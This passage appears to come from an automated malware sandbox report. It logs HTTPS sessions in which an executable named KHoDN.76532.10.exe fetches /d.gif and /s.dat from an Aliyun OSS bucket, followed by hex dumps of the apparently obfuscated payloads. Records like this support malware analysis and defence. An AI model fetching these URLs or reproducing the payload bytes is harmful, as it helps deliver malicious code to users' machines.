b2 dc 31 c1 0b 83 f1 ef 4e ae 92 5c 51 cb 46 ff 81 14 dc 5e 82 ad 5d c2 16 b1 44 f3 42 69 e6 d0 6f 90 26 de 28 67 2c d8 50 e2 e9 cb de 62 77 7f 24 de 7c d1 ce 08 b7 0d Data Ascii: ?.,v*odu!M;r&}0SqO5wredpkI.KC6Slk-B3}pE/7$)&c$WT&dbH53i,?2HFR6FZH@FuqG(p?w-Vsy_R?1N\QF^]DBio&(g,Pbw$\|
2025-03-23 02:15:59 UTC	2868	IN	Data Raw: 1f 62 c2 f3 eb ae 17 07 e0 76 bf b5 ba 60 8f b4 ce 84 53 1b d8 3f 39 93 1e f0 9b 7c 00 36 81 72 d1 4d ef 3b 15 87 e6 91 69 91 40 75 4e 1a 4a e6 61 27 ac 32 16 7b 57 a6 5c aa c8 46 62 03 8e b7 26 3e a4 61 ae 9a 55 23 ea 6f 4d 19 01 28 42 28 c5 80 35 87 dd d5 3e 68 5b 94 7f 79 ef cf 3f 37 81 35 fa 83 99 5b 55 3e 52 3e b6 84 0c 7d de 4c 5c 5a a6 08 57 0e cd e0 c1 08 8c 0c 90 71 ce 6a 12 9a b0 34 27 4d 4f 83 57 73 ca 6a c2 5e 9e 13 d5 74 c2 0b 78 41 57 2f 80 ee 61 fa 85 fb 11 46 91 5c 98 17 29 b5 d6 aa ee 1e 7f f9 cf 64 fc 45 b7 ae b4 6e b4 4b 31 13 91 b9 9c ab ab a7 8b c4 0a 87 b0 9a 0e bc 3d e1 6f c8 86 5f f8 1e ff 70 93 25 42 16 c5 08 0c a8 a4 92 fb 5e 18 a3 e1 28 07 a9 3f b6 ae 54 e8 5c 94 53 3d 95 9d a1 46 d4 a3 f5 ad 7c a0 8d 21 c9 da 17 69 3f c7 39 d5 Data Ascii: bv`S?9\|6rM;i@uNJa'2{W\Fb&>aU#oM(B(5>h[y?75[U>R>}L\ZWqj4'MOWsj^txAW/aF\)dEnK1=o_p%B^(?T\S=F\|!i?9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49736	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:16:00 UTC	106	OUT	GET /d.gif HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:16:01 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:16:01 GMT Content-Type: image/gif Content-Length: 3963834 Connection: close x-oss-request-id: 67DF6EE1D4BE2032303AC9FC Accept-Ranges: bytes ETag: "7389347D4BB06F8A6AC6918F164D86B3" Last-Modified: Sun, 23 Mar 2025 01:37:53 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 4683320065836241410 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: c4k0fUuwb4pqxpGPFk2Gsw== x-oss-server-time: 15
2025-03-23 02:16:01 UTC	3549	IN	Data Raw: 42 4d 6a 08 00 00 00 00 00 00 36 00 00 00 28 00 00 00 21 00 00 00 15 00 00 00 01 00 18 00 00 00 00 00 34 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d 68 98 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2e 3a e2 2d 3a e2 46 51 e5 d9 db fa ff ff ff ff ff ff ff ff ff ff ff ff fd ed e3 f7 b7 8d f2 8c 48 f0 80 36 f0 80 36 f0 7f 36 f0 80 36 f0 7f 36 f0 80 36 f0 80 36 f0 80 36 00 2f 3d e0 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2f 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e3 2e 3b e2 2e 3a e2 2e 3a e2 39 45 e4 b2 b7 f4 fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 fc e4 d5 f9 cb ad f7 b9 91 f6 b1 83 f6 b1 84 f7 ba 91 f9 cb ad fc e5 d6 00 2f Data Ascii: BMj6(!4=h.;.;.;.;.;.;.;.:.:.:.:.:.:.:-:FQH66666666/=/;/;/;/;/;.;.;.;.;.;.;.;.;.;.:.:9E/
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 69 ad ea 79 9e 2c 71 cf be e6 fd 57 6b 53 bc 60 35 a1 ff ba 28 3e 26 8c 61 b8 66 d2 af 60 ed e6 53 a8 cc ad 04 98 92 f4 84 0b a7 46 4f 3b 89 04 6e e6 f3 00 bc 1c 5f 9d 09 30 2f 7a 98 08 8d 31 84 f7 b9 c4 26 c5 25 15 86 c6 8a 5d 9e 5a 55 3e 7d 4b 2c 15 e6 07 90 b4 0c 52 10 07 3a 79 6f 22 39 23 0a 76 6c 70 84 36 e3 41 7f eb d8 4a 72 8d d6 0c 86 6f 5c 72 7b 7e 3b d4 cc 8d b4 d1 83 90 09 a0 b5 27 c6 e8 5c 6f 76 7e 4b 5a c8 a5 f4 52 76 f1 99 11 12 7c 50 db a6 63 d0 7f bd a5 db 86 fc 85 e2 aa 47 4a 58 a7 38 0f d3 3c 65 dd ce c9 c6 9c 9a f4 71 7b 86 d8 db 4c 4f 07 65 49 d4 65 5f fd 52 28 34 4f 84 d2 db 9b fa fb 52 a7 5a f6 d2 9f 1f 7b 8f 79 0c 22 77 87 76 1a da 6a ab 96 19 05 26 88 d7 c0 66 35 2a 6e 02 8c e0 65 0f 1c 3e f4 8d 23 9e 4b d3 50 6b ca 12 17 dd 78 01 Data Ascii: iy,qWkS`5(>&af`SFO;n_0/z1&%]ZU>}K,R:yo"9#vlp6AJro\r{~;'\ov~KZRv\|PcGJX8<eq{LOeIe_R(4ORZ{y"wvj&f5*ne>#KPkx
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: a5 ed 0d c5 80 77 46 e7 2c bc bc 35 a4 0d dd 80 85 93 39 42 dc b1 7b 3a 7f 17 90 37 61 12 f0 09 b2 14 55 96 67 d8 85 71 56 d8 50 67 ad 08 c1 74 68 f1 87 39 f7 a7 ad c2 e4 d1 b9 03 f0 b3 fd c5 36 96 8b ba ad f5 38 a4 8b bd ee 26 e7 8b e4 80 9f ba 1f 50 e0 6c 74 43 db 19 ae d0 08 61 9b f3 14 31 8a b9 2e d7 24 fb aa 93 5a 6f 7b 7c 6f dd 7e ff 39 a5 b6 20 b4 d4 c8 ae 0f 76 91 d4 e3 b6 e7 1d 5f 8c 0c 37 78 c8 ff 18 d5 02 34 10 6b 77 d1 33 9f 30 2b 13 6b 6b 6f b2 24 65 66 ef a1 59 50 50 e0 50 87 b9 54 be 11 0b 85 1c cd 46 3c 87 0b 8e a2 7b 34 f6 d0 df e1 28 55 69 fd b2 15 7c 0f 53 26 ff 1d b1 90 e4 42 56 c1 09 90 9c 49 04 49 62 6c 58 e5 fa e1 25 51 21 34 49 4a f9 ea 5a 91 93 22 de 7a 92 3c b0 9c 41 e9 04 03 b0 74 54 e5 f1 3b 1a 3d c5 14 91 f2 c7 15 d0 05 a0 99 Data Ascii: wF,59B{:7aUgqVPgth968&PltCa1.$Zo{\|o~9 v_7x4kw30+kko$efYPPPTF<{4(Ui\|S&BVIIblX%Q!4IJZ"z<AtT;=
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: c9 cf c9 c3 c9 37 39 3b 39 3f b9 3b 39 37 49 4b 49 4f 49 ad 11 6f 59 5b 59 5f 59 5b 59 57 49 4b 49 4f 49 0f 23 4f 79 7b 79 7f 79 7b 79 77 49 4b 49 4f 49 21 04 6b 59 5b 59 5f 59 5b 59 57 49 4b 49 4f 49 07 d1 11 39 3b 39 3f 39 bf 5a 1e c9 cb c9 cf c9 f5 a9 fd d9 db d9 df d9 d7 be eb c9 cb c9 cf c9 73 49 cc f9 fb f9 ff f9 0f df dd c9 cb c9 cf c9 cb c9 d7 d9 db d9 df d9 db d9 d7 c9 cb c9 cf c9 cb c9 37 39 3b 39 3f 39 3b 39 37 49 4b 49 4f 49 4b 49 57 59 5b 59 5f 59 5b 59 57 49 4b 49 4f 49 4b 49 77 79 7b 79 7f 79 7b 79 77 49 4b 49 4f 49 4b 49 57 59 5b 59 5f 59 5b 59 57 49 4b 49 4f 49 4b 49 37 39 3b 39 3f 39 3b 39 37 c9 cb c9 cf c9 cb c9 d7 d9 db d9 df d9 db d9 d7 c9 cb c9 cf c9 cb c9 f7 f9 fb f9 ff f9 fb f9 f7 c9 cb c9 cf c9 cb c9 d7 d9 db d9 df d9 db d9 d7 c9 Data Ascii: 79;9?;97IKIOIoY[Y_Y[YWIKIOI#Oy{yy{ywIKIOI!kY[Y_Y[YWIKIOI9;9?9ZsI79;9?9;97IKIOIKIWY[Y_Y[YWIKIOIKIwy{yy{ywIKIOIKIWY[Y_Y[YWIKIOIKI79;9?9;97
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 5b e8 c1 77 21 36 a8 44 e8 08 27 24 0f db dc 99 b9 05 bc 85 db 8e 6c be 48 07 0b 2a 25 61 a5 de 9b bf 03 8e 10 3f 00 11 81 c8 64 7e 0a b6 89 57 22 7f 9b bb 03 a2 ff 2d 81 95 bb 1f 83 40 5c f1 8e f3 62 4f c2 46 38 75 2f eb bf 50 cf 90 4e 8c 33 c2 18 e8 c3 dc 3f 60 65 0c 29 91 2c f9 f6 3a 22 db 0c 4e 74 3a 39 1d 42 43 2a 0b b3 32 6f bd 8e 75 66 55 ea 33 51 70 73 13 e5 c2 0a 27 83 3e b2 e8 40 d1 7c 5a b2 bd c5 ef e7 77 5a 40 8f 9a 50 70 9c cd 22 41 ba ad fd 70 fd b8 24 e5 30 a0 73 49 de 7c 43 52 20 2f 22 ad 79 66 28 ee 6e ce ed 49 38 3c 27 88 ab 93 be 37 bc ba 47 1f 55 1a d0 58 89 44 92 a4 cc 79 64 32 31 1f 32 28 72 2e ce e7 0e b9 c3 0c 40 c6 88 46 ae cf 98 80 5b 32 a9 1b 95 ca 34 b9 a2 79 00 91 b8 c6 d9 eb b7 f9 07 8d cf 8a cc 7c fd 87 95 ad 5f f1 57 f8 91 Data Ascii: [w!6D'$lH%a?d~W"-@\bOF8u/PN3?`e),:"Nt:9BC2oufU3Qps'>@\|ZwZ@Pp"Ap$0sI\|CR /"yf(nI8<'7GUXDyd212(r.@F[24y\|_W
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 60 a1 d4 b6 e8 80 1f 3f 08 c1 8c f8 c3 d6 8a ce a7 c0 f4 10 7b de c9 df 00 64 2f 96 8d f7 b4 78 84 9a c0 1f 7f 67 f8 5b e2 9d 47 58 74 89 0c 77 c9 12 96 d1 ea 60 73 5f 03 f8 1f e3 53 d4 22 ba 9a fb 8a b1 b4 62 e1 a6 22 d2 24 9a 26 2c 93 11 ca 6c 02 c9 ac 2f af 39 da 54 aa e1 f3 f8 e2 d9 c8 20 b2 c9 0c 1c fc bf f3 9d 29 bb ec 43 ce 4d 36 54 50 c6 0f 69 44 60 ea 2a ac dd 8b 7b d7 64 9d f7 ae 7e 0a cd cc 1d 31 d1 6a 80 dd df 7e a5 e7 b5 e4 f3 f5 da 2b 74 10 7e ee 4f 68 1b 2d a1 f5 1b f9 89 c2 9d 6f 26 fb 1b 9e ec b4 2f 8d 5a 50 4a fe 47 fd 7b bd b0 e5 0b 95 de 9e a1 34 cb f0 77 68 7e ef d6 f2 d3 a2 c4 9e 0a a3 9f e0 0c 23 73 9d 03 b6 da 88 37 e9 a6 64 9b 78 88 24 85 0a 59 7c 20 75 a3 3d 63 9b 34 e2 4c 9a a8 55 87 ed 7d ce fd 76 a0 33 67 8d 19 57 e5 a8 07 df Data Ascii: `?{d/xg[GXtw`s_S"b"$&,l/9T )CM6TPiD`*{d~1j~+t~Oh-o&/ZPJG{4wh~#s7dx$Y\| u=c4LU}v3gW
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 9d d8 af da 9f 12 9d 42 b1 83 18 a9 2c a8 84 6d 1b 63 f4 98 7d 22 82 cf ca 2e 2d 5e e2 3f cf 93 76 ae b6 80 bc 51 95 c0 7e a5 ed e8 08 a8 69 37 3e ee 3c d0 7f 0f ff 6e bd d8 82 cf ca 26 be 6a ed a3 11 e0 d0 95 eb 1d 52 52 37 4b ce 4b 72 cc 13 5b 5a ba e7 69 36 89 e0 97 0f e3 95 a5 06 4b 2d 48 12 5f 5a 86 5f ac fc f0 e0 5c 76 85 16 80 9c ae c6 5e a4 6c de 01 4d 4c a8 ff 4f 32 68 e6 3b 7b 89 87 18 aa 8a 55 66 bc f6 47 87 54 be 21 a8 d6 32 9d e1 1e 4e bf de 84 cd c8 28 57 c1 7b a8 52 fa 00 0f c7 aa 96 c7 61 25 a9 a3 e3 da 3a 0e da c3 1f 2e ee fe 88 e4 c3 64 58 0b 8c dd d8 38 ea 53 79 ba 7d f4 85 98 43 bc 6a 86 bc 3c 62 7c 93 1b 11 5d 44 a8 c3 91 85 c7 ac a3 b3 e6 0f bf 34 29 c5 f4 27 39 65 f7 6c d2 4e 9e cc b3 1c 70 75 8d 2d 93 90 1a 05 9b d4 15 02 f2 9c 40 Data Ascii: B,mc}".-^?vQ~i7><n&jRR7KKr[Zi6K-H_Z_\v^lMLO2h;{UfGT!2N(W{Ra%:.dX8Sy}Cj<b\|]D4)'9elNpu-@
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 64 c6 c8 a6 a9 1b 47 e6 2b 66 82 6d b4 99 88 66 09 c3 75 61 4b e7 4b 21 0a 93 41 e3 08 b9 3e 95 15 12 4c 17 ea 40 be 35 e8 3a a4 7f ea c0 de 35 48 da 04 5f 62 68 36 7d 88 7b 48 06 f7 c9 5e 93 cf 10 48 13 14 06 7d 0d 05 59 e9 36 21 8c 0a db 10 3f 1d 73 6b de dd 98 d0 cc f9 0c f8 59 46 81 08 67 1f f8 0c 3f 52 34 ee a2 07 a9 01 4e c5 6c 74 f8 fa 79 1e cb c7 09 39 7c 4d c3 6f 0f fb 20 48 b2 15 5a 94 74 1c 08 2c 30 3c 68 a5 7f f2 eb e1 7f 30 de 0e ef 8b 13 d2 03 7d 53 11 90 0d 6f 41 58 af 7b c9 88 0d 5f 79 e2 31 f6 1d 53 41 a3 65 87 7e 4b ec 44 57 7a 92 13 7e 0b 15 04 d0 94 5f 22 05 6c 80 b7 ca 76 8f 87 aa 8e e6 7e 5d b8 d0 f8 94 28 37 86 62 8e 66 ce 35 31 01 5b b1 5a 85 a6 b7 a1 98 bf e5 14 c0 79 db 4d b6 ab ec c3 4d ac 84 29 a0 32 0a 4b b2 8e fb be b3 8f c3 Data Ascii: dG+fmfuaKK!A>L@5:5H_bh6}{H^H}Y6!?skYFg?R4Nlty9\|Mo HZt,0<h0}SoAX{_y1SAe~KDWz~_"lv~](7bf51[ZyMM)2K
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 36 be 3d 5e 49 fc 52 1e de b3 68 f5 7e 0b e2 0c 99 1a 40 7a 7b b4 a6 2a bd db 34 c4 4d d9 f9 d2 6b 22 dd 51 ca 48 15 ee 42 7f f5 00 ed c3 c6 2b aa da 5b aa ff 3e cd 85 df a1 cc 32 e0 02 70 c2 42 53 b9 44 73 4d 0f 57 db c0 48 ff 26 ec 2f 2a 76 5d 06 e0 f5 08 17 65 b1 9b 0e 95 f7 39 8f 84 a5 43 a9 7b 3a 34 df dc 2e b8 f9 e3 90 6b 74 1c ff 34 23 b1 8f 2a fc 2e e9 ae 5a 49 6e e1 fd 4e fb 12 72 96 55 aa 2a 2e dd da 0a 8e 85 8a a2 26 0d e3 1b cb 9a 04 d5 04 80 00 17 d4 f8 50 77 ad 1b c5 52 66 82 fd 2b 28 2f d3 a3 47 84 eb 1e 62 6a 52 db 69 2a 3e 21 7a 3c 0c 08 5b 70 41 47 09 bb 37 9e a9 b0 a6 5b da d9 d6 77 8e 03 fe 5c 8e 2d d4 0d 9c 6d 43 33 4c ad 60 f9 b8 5d f4 51 90 5c a4 ed 5f c9 a7 52 7f be ef 02 ef 6e 73 9a 03 ae 03 ba 4f 82 d2 ba a1 82 e2 e2 d1 f2 42 da Data Ascii: 6=^IRh~@z{4Mk"QHB+[>2pBSDsMWH&/v]e9C{:4.kt4#.ZInNrU.&PwRf+(/GbjRi*>!z<[pAG7[w\-mC3L`]Q\_RnsOB
2025-03-23 02:16:01 UTC	4096	IN	Data Raw: 59 61 3f 74 49 cc aa 53 35 a1 e8 90 69 7f 21 ce 03 34 fe df 3e 8b c5 16 d4 9c 43 84 57 a9 d1 8f dc 58 db 26 93 9d d3 d8 de 94 15 3c 16 5c bc 9e 5e 7b 0d 2a 8e f6 37 54 7c b9 6f c8 9c 34 af 2e 9c 7b 8f aa e8 5a 34 27 c3 7d 18 10 37 a8 4a b6 14 fb b9 d9 43 48 6a 16 e4 c4 f3 e7 74 76 0a 00 d7 c5 3a e0 25 32 44 ef 89 ed b3 64 a2 92 e4 0f 59 7d 5b 4c ea 32 69 b2 f8 05 9b c0 7d 01 e4 c2 6f 7a 91 61 3e f4 04 59 6b d2 82 c7 cb b2 65 13 f1 40 8f af bd c2 84 83 ef 6f e7 85 2f e0 87 c1 9d 5d 1d 27 61 74 59 62 60 d5 f5 b3 14 fb 1c 3b 7f f9 94 54 cf 15 bd d9 2e eb dc 6a d8 03 d1 ad 47 a8 ea ca 70 21 6d 7e c7 fa 9d 6e 73 32 b6 4f 41 bc 8b 36 7b f6 c7 6b 6e 58 b7 63 49 32 23 35 52 67 47 be 94 f3 fa e4 63 25 b3 0f b2 ce 0b bd 00 63 9c 47 25 fc df 6f e4 b0 30 6f 29 1c 83 Data Ascii: Ya?tIS5i!4>CWX&<\^{*7T\|o4.{Z4'}7JCHjtv:%2DdY}[L2i}oza>Yke@o/]'atYb`;T.jGp!m~ns2OA6{knXcI2#5RgGc%cG%o0o)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49737	39.103.20.80	443	8564	C:\Users\user\Desktop\KHoDN.76532.10.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-23 02:16:08 UTC	106	OUT	GET /s.dat HTTP/1.1 User-Agent: 3M Host: f3rf3r.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-03-23 02:16:08 UTC	560	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 23 Mar 2025 02:16:08 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 67DF6EE80AD07139332DE944 Accept-Ranges: bytes ETag: "343BE4202B504E07A24093ACF7DD5004" Last-Modified: Sun, 23 Mar 2025 02:15:56 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 14457525537770736733 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: NDvkICtQTgeiQJOs991QBA== x-oss-server-time: 9
2025-03-23 02:16:08 UTC	3536	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-03-23 02:16:08 UTC	4096	IN	Data Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 Data Ascii: _##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-03-23 02:16:08 UTC	4096	IN	Data Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-03-23 02:16:08 UTC	4096	IN	Data Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 Data Ascii: 0JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2025-03-23 02:16:08 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-03-23 02:16:08 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-03-23 02:16:08 UTC	4096	IN	Data Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 Data Ascii: G<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
